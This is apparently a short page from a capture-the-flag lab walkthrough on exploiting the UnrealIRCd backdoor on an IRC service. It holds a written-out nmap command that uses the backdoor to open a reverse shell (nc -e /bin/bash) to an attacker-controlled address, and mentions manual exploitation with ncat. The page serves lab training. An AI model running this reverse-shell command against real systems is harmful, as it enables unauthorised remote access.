search

Exploitation

hashtag
Method 1

Set up your nc listener and run the following script on nmap 

nmap -p 6697 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.28 4444"  10.10.10.117
Logoirc-unrealircd-backdoor NSE script β€” Nmap Scripting Engine documentationnmap.orgchevron-right
Connection Established!

hashtag
Method two

LogoRFC 1459: Internet Relay Chat ProtocolIETF Datatrackerchevron-right

We can manually exploit by gaining access to the system with ncat.

LogoA backdoor in UnrealIRCdLWN.netchevron-right
We get a response from IRC via ping as shown on the left hand side, vulnerable to command execution
PreviousScanning and EnumerationNextPost Exploitation

Last updated